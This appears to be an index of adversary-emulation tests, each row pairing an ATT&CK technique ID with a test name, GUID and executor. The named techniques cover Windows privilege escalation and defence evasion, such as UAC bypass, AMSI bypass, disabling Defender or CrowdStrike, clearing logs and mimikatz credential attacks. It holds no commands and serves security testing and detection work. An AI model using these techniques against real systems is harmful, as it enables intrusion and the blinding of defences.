102 privilege-escalation T1078.003 Local Accounts 1 Create local account with admin priviliges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
103 privilege-escalation T1037.001 Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
104 privilege-escalation T1546.007 Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
105 privilege-escalation T1134.004 Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
106 privilege-escalation T1134.004 Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
107 privilege-escalation T1134.004 Parent PID Spoofing 3 Parent PID Spoofing - Spawn from Specified Process cbbff285-9051-444a-9d17-c07cd2d230eb powershell
108 privilege-escalation T1134.004 Parent PID Spoofing 4 Parent PID Spoofing - Spawn from svchost.exe e9f2b777-3123-430b-805d-5cedc66ab591 powershell
109 privilege-escalation T1134.004 Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
110 privilege-escalation T1574.009 Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
111 privilege-escalation T1547.010 Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
112 privilege-escalation T1546.013 PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
113 privilege-escalation T1055.012 Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
114 privilege-escalation T1055.012 Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
115 privilege-escalation T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
116 privilege-escalation T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
117 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
118 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
119 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
120 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
121 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
122 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
123 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
124 privilege-escalation T1053.005 Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
125 privilege-escalation T1053.005 Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
126 privilege-escalation T1053.005 Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
127 privilege-escalation T1053.005 Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
128 privilege-escalation T1053.005 Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
129 privilege-escalation T1053.005 Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
130 privilege-escalation T1546.002 Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
131 privilege-escalation T1547.005 Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
132 privilege-escalation T1574.011 Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
133 privilege-escalation T1574.011 Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
134 privilege-escalation T1547.009 Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
135 privilege-escalation T1547.009 Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
136 privilege-escalation T1134.001 Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
137 privilege-escalation T1134.001 Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
138 privilege-escalation T1546.003 Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
139 privilege-escalation T1543.003 Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
140 privilege-escalation T1543.003 Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
141 privilege-escalation T1543.003 Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
142 privilege-escalation T1547.004 Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
143 privilege-escalation T1547.004 Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
144 privilege-escalation T1547.004 Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
145 defense-evasion T1055.004 Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
146 defense-evasion T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
147 defense-evasion T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
148 defense-evasion T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
149 defense-evasion T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
150 defense-evasion T1548.002 Bypass User Account Control 1 Bypass UAC using Event Viewer (cmd) 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 command_prompt
151 defense-evasion T1548.002 Bypass User Account Control 2 Bypass UAC using Event Viewer (PowerShell) a6ce9acf-842a-4af6-8f79-539be7608e2b powershell
152 defense-evasion T1548.002 Bypass User Account Control 3 Bypass UAC using Fodhelper 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
153 defense-evasion T1548.002 Bypass User Account Control 4 Bypass UAC using Fodhelper - PowerShell 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
154 defense-evasion T1548.002 Bypass User Account Control 5 Bypass UAC using ComputerDefaults (PowerShell) 3c51abf2-44bf-42d8-9111-dc96ff66750f powershell
155 defense-evasion T1548.002 Bypass User Account Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
156 defense-evasion T1548.002 Bypass User Account Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
157 defense-evasion T1548.002 Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
158 defense-evasion T1548.002 Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
159 defense-evasion T1218.003 CMSTP 1 CMSTP Executing Remote Scriptlet 34e63321-9683-496b-bbc1-7566bc55e624 command_prompt
160 defense-evasion T1218.003 CMSTP 2 CMSTP Executing UAC Bypass 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 command_prompt
161 defense-evasion T1574.012 COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
162 defense-evasion T1574.012 COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
163 defense-evasion T1574.012 COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
164 defense-evasion T1070.003 Clear Command History 10 Prevent Powershell History Logging 2f898b81-3e97-4abb-bc3f-a95138988370 powershell
165 defense-evasion T1070.003 Clear Command History 11 Clear Powershell History by Deleting History File da75ae8d-26d6-4483-b0fe-700e4df4f037 powershell
166 defense-evasion T1070.001 Clear Windows Event Logs 1 Clear Logs e6abb60e-26b8-41da-8aae-0c35174b0967 command_prompt
167 defense-evasion T1070.001 Clear Windows Event Logs 2 Delete System Logs Using Clear-EventLog b13e9306-3351-4b4b-a6e8-477358b0b498 powershell
168 defense-evasion T1070.001 Clear Windows Event Logs 3 Clear Event Logs via VBA 1b682d84-f075-4f93-9a89-8a8de19ffd6e powershell
169 defense-evasion T1027.004 Compile After Delivery 1 Compile After Delivery using csc.exe ffcdbd6a-b0e8-487d-927a-09127fe9a206 command_prompt
170 defense-evasion T1027.004 Compile After Delivery 2 Dynamic C# Compile 453614d8-3ba6-4147-acc0-7ec4b3e1faef powershell
171 defense-evasion T1218.001 Compiled HTML File 1 Compiled HTML Help Local Payload 5cb87818-0d7c-4469-b7ef-9224107aebe8 command_prompt
172 defense-evasion T1218.001 Compiled HTML File 2 Compiled HTML Help Remote Payload 0f8af516-9818-4172-922b-42986ef1e81d command_prompt
173 defense-evasion T1218.001 Compiled HTML File 3 Invoke CHM with default Shortcut Command Execution 29d6f0d7-be63-4482-8827-ea77126c1ef7 powershell
174 defense-evasion T1218.001 Compiled HTML File 4 Invoke CHM with InfoTech Storage Protocol Handler b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 powershell
175 defense-evasion T1218.001 Compiled HTML File 5 Invoke CHM Simulate Double click 5decef42-92b8-4a93-9eb2-877ddcb9401a powershell
176 defense-evasion T1218.001 Compiled HTML File 6 Invoke CHM with Script Engine and Help Topic 4f83adda-f5ec-406d-b318-9773c9ca92e5 powershell
177 defense-evasion T1218.001 Compiled HTML File 7 Invoke CHM Shortcut Command with ITS and Help Topic 15756147-7470-4a83-87fb-bb5662526247 powershell
178 defense-evasion T1218.002 Control Panel 1 Control Panel Items 037e9d8a-9e46-4255-8b33-2ae3b545ca6f command_prompt
179 defense-evasion T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
180 defense-evasion T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
181 defense-evasion T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
182 defense-evasion T1140 Deobfuscate/Decode Files or Information 1 Deobfuscate/Decode Files Or Information dc6fe391-69e6-4506-bd06-ea5eeb4082f8 command_prompt
183 defense-evasion T1140 Deobfuscate/Decode Files or Information 2 Certutil Rename and Decode 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 command_prompt
184 defense-evasion T1006 Direct Volume Access 1 Read volume boot sector via DOS device path (PowerShell) 88f6327e-51ec-4bbf-b2e8-3fea534eab8b powershell
185 defense-evasion T1562.002 Disable Windows Event Logging 1 Disable Windows IIS HTTP Logging 69435dcf-c66f-4ec0-a8b1-82beb76b34db powershell
186 defense-evasion T1562.002 Disable Windows Event Logging 2 Kill Event Log Service Threads 41ac52ba-5d5e-40c0-b267-573ed90489bd powershell
187 defense-evasion T1562.002 Disable Windows Event Logging 3 Impair Windows Audit Log Policy 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 command_prompt
188 defense-evasion T1562.002 Disable Windows Event Logging 4 Clear Windows Audit Policy Config 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 command_prompt
189 defense-evasion T1562.004 Disable or Modify System Firewall 2 Disable Microsoft Defender Firewall 88d05800-a5e4-407e-9b53-ece4174f197f command_prompt
190 defense-evasion T1562.004 Disable or Modify System Firewall 3 Disable Microsoft Defender Firewall via Registry afedc8c4-038c-4d82-b3e5-623a95f8a612 command_prompt
191 defense-evasion T1562.004 Disable or Modify System Firewall 4 Allow SMB and RDP on Microsoft Defender Firewall d9841bf8-f161-4c73-81e9-fd773a5ff8c1 command_prompt
192 defense-evasion T1562.004 Disable or Modify System Firewall 5 Opening ports for proxy - HARDRAIN 15e57006-79dd-46df-9bf9-31bc24fb5a80 command_prompt
193 defense-evasion T1562.004 Disable or Modify System Firewall 6 Open a local port through Windows Firewall to any profile 9636dd6e-7599-40d2-8eee-ac16434f35ed powershell
194 defense-evasion T1562.004 Disable or Modify System Firewall 7 Allow Executable Through Firewall Located in Non-Standard Location 6f5822d2-d38d-4f48-9bfc-916607ff6b8c powershell
195 defense-evasion T1562.001 Disable or Modify Tools 10 Unload Sysmon Filter Driver 811b3e76-c41b-430c-ac0d-e2380bfaa164 command_prompt
196 defense-evasion T1562.001 Disable or Modify Tools 11 Uninstall Sysmon a316fb2e-5344-470d-91c1-23e15c374edc command_prompt
197 defense-evasion T1562.001 Disable or Modify Tools 12 AMSI Bypass - AMSI InitFailed 695eed40-e949-40e5-b306-b4031e4154bd powershell
198 defense-evasion T1562.001 Disable or Modify Tools 13 AMSI Bypass - Remove AMSI Provider Reg Key 13f09b91-c953-438e-845b-b585e51cac9b powershell
199 defense-evasion T1562.001 Disable or Modify Tools 14 Disable Arbitrary Security Windows Service a1230893-56ac-4c81-b644-2108e982f8f5 command_prompt
200 defense-evasion T1562.001 Disable or Modify Tools 15 Tamper with Windows Defender ATP PowerShell 6b8df440-51ec-4d53-bf83-899591c9b5d7 powershell
201 defense-evasion T1562.001 Disable or Modify Tools 16 Tamper with Windows Defender Command Prompt aa875ed4-8935-47e2-b2c5-6ec00ab220d2 command_prompt
202 defense-evasion T1562.001 Disable or Modify Tools 17 Tamper with Windows Defender Registry 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45 powershell
203 defense-evasion T1562.001 Disable or Modify Tools 18 Disable Microsoft Office Security Features 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7 powershell
204 defense-evasion T1562.001 Disable or Modify Tools 19 Remove Windows Defender Definition Files 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 command_prompt
205 defense-evasion T1562.001 Disable or Modify Tools 20 Stop and Remove Arbitrary Security Windows Service ae753dda-0f15-4af6-a168-b9ba16143143 powershell
206 defense-evasion T1562.001 Disable or Modify Tools 21 Uninstall Crowdstrike Falcon on Windows b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297 powershell
207 defense-evasion T1562.001 Disable or Modify Tools 22 Tamper with Windows Defender Evade Scanning -Folder 0b19f4ee-de90-4059-88cb-63c800c683ed powershell
208 defense-evasion T1562.001 Disable or Modify Tools 23 Tamper with Windows Defender Evade Scanning -Extension 315f4be6-2240-4552-b3e1-d1047f5eecea powershell
209 defense-evasion T1562.001 Disable or Modify Tools 24 Tamper with Windows Defender Evade Scanning -Process a123ce6a-3916-45d6-ba9c-7d4081315c27 powershell
210 defense-evasion T1055.001 Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
211 defense-evasion T1070.004 File Deletion 4 Delete a single file - Windows cmd 861ea0b4-708a-4d17-848d-186c9c7f17e3 command_prompt
212 defense-evasion T1070.004 File Deletion 5 Delete an entire folder - Windows cmd ded937c4-2add-42f7-9c2c-c742b7a98698 command_prompt
213 defense-evasion T1070.004 File Deletion 6 Delete a single file - Windows PowerShell 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 powershell
214 defense-evasion T1070.004 File Deletion 7 Delete an entire folder - Windows PowerShell edd779e4-a509-4cba-8dfa-a112543dbfb1 powershell
215 defense-evasion T1070.004 File Deletion 9 Delete Prefetch File 36f96049-0ad7-4a5f-8418-460acaeb92fb powershell
216 defense-evasion T1070.004 File Deletion 10 Delete TeamViewer Log Files 69f50a5f-967c-4327-a5bb-e1a9a9983785 powershell
217 defense-evasion T1564.001 Hidden Files and Directories 3 Create Windows System File with Attrib f70974c8-c094-4574-b542-2c545af95a32 command_prompt
218 defense-evasion T1564.001 Hidden Files and Directories 4 Create Windows Hidden File with Attrib dadb792e-4358-4d8d-9207-b771faa0daa5 command_prompt
219 defense-evasion T1564.003 Hidden Window 1 Hidden Window f151ee37-9e2b-47e6-80e4-550b9f999b7a powershell
220 defense-evasion T1564 Hide Artifacts 1 Extract binary files via VBA 6afe288a-8a8b-4d33-a629-8d03ba9dad3a powershell
221 defense-evasion T1564 Hide Artifacts 2 Create a Hidden User Called "$" 2ec63cc2-4975-41a6-bf09-dffdfb610778 command_prompt
222 defense-evasion T1564 Hide Artifacts 3 Create an "Administrator " user (with a space on the end) 5bb20389-39a5-4e99-9264-aeb92a55a85c powershell
223 defense-evasion T1070 Indicator Removal on Host 1 Indicator Removal using FSUtil b4115c7a-0e92-47f0-a61e-17e7218b2435 command_prompt
224 defense-evasion T1202 Indirect Command Execution 1 Indirect Command Execution - pcalua.exe cecfea7a-5f03-4cdd-8bc8-6f7c22862440 command_prompt
225 defense-evasion T1202 Indirect Command Execution 2 Indirect Command Execution - forfiles.exe 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc command_prompt
226 defense-evasion T1202 Indirect Command Execution 3 Indirect Command Execution - conhost.exe cf3391e0-b482-4b02-87fc-ca8362269b29 command_prompt
227 defense-evasion T1553.004 Install Root Certificate 4 Install root CA on Windows 76f49d86-5eb1-461a-a032-a480f86652f1 powershell
228 defense-evasion T1553.004 Install Root Certificate 5 Install root CA on Windows with certutil 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f powershell
229 defense-evasion T1218.004 InstallUtil 1 CheckIfInstallable method call ffd9c807-d402-47d2-879d-f915cf2a3a94 powershell
230 defense-evasion T1218.004 InstallUtil 2 InstallHelper method call d43a5bde-ae28-4c55-a850-3f4c80573503 powershell
231 defense-evasion T1218.004 InstallUtil 3 InstallUtil class constructor method call 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 powershell
232 defense-evasion T1218.004 InstallUtil 4 InstallUtil Install method call 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b powershell
233 defense-evasion T1218.004 InstallUtil 5 InstallUtil Uninstall method call - /U variant 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b powershell
234 defense-evasion T1218.004 InstallUtil 6 InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant 06d9deba-f732-48a8-af8e-bdd6e4d98c1d powershell
235 defense-evasion T1218.004 InstallUtil 7 InstallUtil HelpText method call 5a683850-1145-4326-a0e5-e91ced3c6022 powershell
236 defense-evasion T1218.004 InstallUtil 8 InstallUtil evasive invocation 559e6d06-bb42-4307-bff7-3b95a8254bad powershell
237 defense-evasion T1078.003 Local Accounts 1 Create local account with admin priviliges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
238 defense-evasion T1127.001 MSBuild 1 MSBuild Bypass Using Inline Tasks (C#) 58742c0f-cb01-44cd-a60b-fb26e8871c93 command_prompt
239 defense-evasion T1127.001 MSBuild 2 MSBuild Bypass Using Inline Tasks (VB) ab042179-c0c5-402f-9bc8-42741f5ce359 command_prompt
240 defense-evasion T1553.005 Mark-of-the-Web Bypass 1 Mount ISO image 002cca30-4778-4891-878a-aaffcfa502fa powershell
241 defense-evasion T1553.005 Mark-of-the-Web Bypass 2 Mount an ISO image and run executable from the ISO 42f22b00-0242-4afc-a61b-0da05041f9cc powershell
242 defense-evasion T1036.004 Masquerade Task or Service 1 Creating W32Time similar named service using schtasks f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 command_prompt
243 defense-evasion T1036.004 Masquerade Task or Service 2 Creating W32Time similar named service using sc b721c6ef-472c-4263-a0d9-37f1f4ecff66 command_prompt
244 defense-evasion T1036 Masquerading 1 System File Copied to Unusual Location 51005ac7-52e2-45e0-bdab-d17c6d4916cd command_prompt
245 defense-evasion T1112 Modify Registry 1 Modify Registry of Current User Profile - cmd 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 command_prompt
246 defense-evasion T1112 Modify Registry 2 Modify Registry of Local Machine - cmd 282f929a-6bc5-42b8-bd93-960c3ba35afe command_prompt
247 defense-evasion T1112 Modify Registry 3 Modify registry to store logon credentials c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 command_prompt
248 defense-evasion T1112 Modify Registry 4 Add domain to Trusted sites Zone cf447677-5a4e-4937-a82c-e47d254afd57 powershell
249 defense-evasion T1112 Modify Registry 5 Javascript in registry 15f44ea9-4571-4837-be9e-802431a7bfae powershell
250 defense-evasion T1112 Modify Registry 6 Change Powershell Execution Policy to Bypass f3a6cceb-06c9-48e5-8df8-8867a6814245 powershell
251 defense-evasion T1218.005 Mshta 1 Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject 1483fab9-4f52-4217-a9ce-daa9d7747cae command_prompt
252 defense-evasion T1218.005 Mshta 2 Mshta executes VBScript to execute malicious command 906865c3-e05f-4acc-85c4-fbc185455095 command_prompt
253 defense-evasion T1218.005 Mshta 3 Mshta Executes Remote HTML Application (HTA) c4b97eeb-5249-4455-a607-59f95485cb45 powershell
254 defense-evasion T1218.005 Mshta 4 Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement 007e5672-2088-4853-a562-7490ddc19447 powershell
255 defense-evasion T1218.005 Mshta 5 Invoke HTML Application - Jscript Engine Simulating Double Click 58a193ec-131b-404e-b1ca-b35cf0b18c33 powershell
256 defense-evasion T1218.005 Mshta 6 Invoke HTML Application - Direct download from URI 39ceed55-f653-48ac-bd19-aceceaf525db powershell
257 defense-evasion T1218.005 Mshta 7 Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler e7e3a525-7612-4d68-a5d3-c4649181b8af powershell
258 defense-evasion T1218.005 Mshta 8 Invoke HTML Application - JScript Engine with Inline Protocol Handler d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 powershell
259 defense-evasion T1218.005 Mshta 9 Invoke HTML Application - Simulate Lateral Movement over UNC Path b8a8bdb2-7eae-490d-8251-d5e0295b2362 powershell
260 defense-evasion T1218.007 Msiexec 1 Msiexec.exe - Execute Local MSI file 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8 command_prompt
261 defense-evasion T1218.007 Msiexec 2 Msiexec.exe - Execute Remote MSI file bde7d2fe-d049-458d-a362-abda32a7e649 command_prompt
262 defense-evasion T1218.007 Msiexec 3 Msiexec.exe - Execute Arbitrary DLL 66f64bd5-7c35-4c24-953a-04ca30a0a0ec command_prompt
263 defense-evasion T1564.004 NTFS File Attributes 1 Alternate Data Streams (ADS) 8822c3b0-d9f9-4daf-a043-49f4602364f4 command_prompt
264 defense-evasion T1564.004 NTFS File Attributes 2 Store file in Alternate Data Stream (ADS) 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 powershell
265 defense-evasion T1564.004 NTFS File Attributes 3 Create ADS command prompt 17e7637a-ddaf-4a82-8622-377e20de8fdb command_prompt
266 defense-evasion T1564.004 NTFS File Attributes 4 Create ADS PowerShell 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 powershell
267 defense-evasion T1070.005 Network Share Connection Removal 1 Add Network Share 14c38f32-6509-46d8-ab43-d53e32d2b131 command_prompt
268 defense-evasion T1070.005 Network Share Connection Removal 2 Remove Network Share 09210ad5-1ef2-4077-9ad3-7351e13e9222 command_prompt
269 defense-evasion T1070.005 Network Share Connection Removal 3 Remove Network Share PowerShell 0512d214-9512-4d22-bde7-f37e058259b3 powershell
270 defense-evasion T1027 Obfuscated Files or Information 2 Execute base64-encoded PowerShell a50d5a97-2531-499e-a1de-5544c74432c6 powershell
271 defense-evasion T1027 Obfuscated Files or Information 3 Execute base64-encoded PowerShell from Windows Registry 450e7218-7915-4be4-8b9b-464a49eafcec powershell
272 defense-evasion T1027 Obfuscated Files or Information 4 Execution from Compressed File f8c8a909-5f29-49ac-9244-413936ce6d1f command_prompt
273 defense-evasion T1027 Obfuscated Files or Information 5 DLP Evasion via Sensitive Data in VBA Macro over email 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad powershell
274 defense-evasion T1027 Obfuscated Files or Information 6 DLP Evasion via Sensitive Data in VBA Macro over HTTP e2d85e66-cb66-4ed7-93b1-833fc56c9319 powershell
275 defense-evasion T1218.008 Odbcconf 1 Odbcconf.exe - Execute Arbitrary DLL 2430498b-06c0-4b92-a448-8ad263c388e2 command_prompt
276 defense-evasion T1134.004 Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
277 defense-evasion T1134.004 Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
278 defense-evasion T1134.004 Parent PID Spoofing 3 Parent PID Spoofing - Spawn from Specified Process cbbff285-9051-444a-9d17-c07cd2d230eb powershell
279 defense-evasion T1134.004 Parent PID Spoofing 4 Parent PID Spoofing - Spawn from svchost.exe e9f2b777-3123-430b-805d-5cedc66ab591 powershell
280 defense-evasion T1134.004 Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
281 defense-evasion T1550.002 Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
282 defense-evasion T1550.002 Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
283 defense-evasion T1550.003 Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
284 defense-evasion T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
285 defense-evasion T1574.009 Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
286 defense-evasion T1055.012 Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
287 defense-evasion T1055.012 Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
288 defense-evasion T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
289 defense-evasion T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
290 defense-evasion T1216.001 PubPrn 1 PubPrn.vbs Signed Script Bypass 9dd29a1f-1e16-4862-be83-913b10a88f6c command_prompt
291 defense-evasion T1218.009 Regsvcs/Regasm 1 Regasm Uninstall Method Call Test 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 command_prompt
292 defense-evasion T1218.009 Regsvcs/Regasm 2 Regsvcs Uninstall Method Call Test fd3c1c6a-02d2-4b72-82d9-71c527abb126 powershell
293 defense-evasion T1218.010 Regsvr32 1 Regsvr32 local COM scriptlet execution 449aa403-6aba-47ce-8a37-247d21ef0306 command_prompt
294 defense-evasion T1218.010 Regsvr32 2 Regsvr32 remote COM scriptlet execution c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 command_prompt
295 defense-evasion T1218.010 Regsvr32 3 Regsvr32 local DLL execution 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b command_prompt
296 defense-evasion T1218.010 Regsvr32 4 Regsvr32 Registering Non DLL 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 command_prompt
297 defense-evasion T1218.010 Regsvr32 5 Regsvr32 Silent DLL Install Call DllRegisterServer 9d71c492-ea2e-4c08-af16-c6994cdf029f command_prompt
298 defense-evasion T1036.003 Rename System Utilities 1 Masquerading as Windows LSASS process 5ba5a3d1-cf3c-4499-968a-a93155d1f717 command_prompt
299 defense-evasion T1036.003 Rename System Utilities 3 Masquerading - cscript.exe running as notepad.exe 3a2a578b-0a01-46e4-92e3-62e2859b42f0 command_prompt
300 defense-evasion T1036.003 Rename System Utilities 4 Masquerading - wscript.exe running as svchost.exe 24136435-c91a-4ede-9da1-8b284a1c1a23 command_prompt
301 defense-evasion T1036.003 Rename System Utilities 5 Masquerading - powershell.exe running as taskhostw.exe ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa command_prompt
302 defense-evasion T1036.003 Rename System Utilities 6 Masquerading - non-windows exe running as windows exe bc15c13f-d121-4b1f-8c7d-28d95854d086 powershell
303 defense-evasion T1036.003 Rename System Utilities 7 Masquerading - windows exe running as different windows exe c3d24a39-2bfe-4c6a-b064-90cd73896cb0 powershell
304 defense-evasion T1036.003 Rename System Utilities 8 Malicious process Masquerading as LSM.exe 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f command_prompt
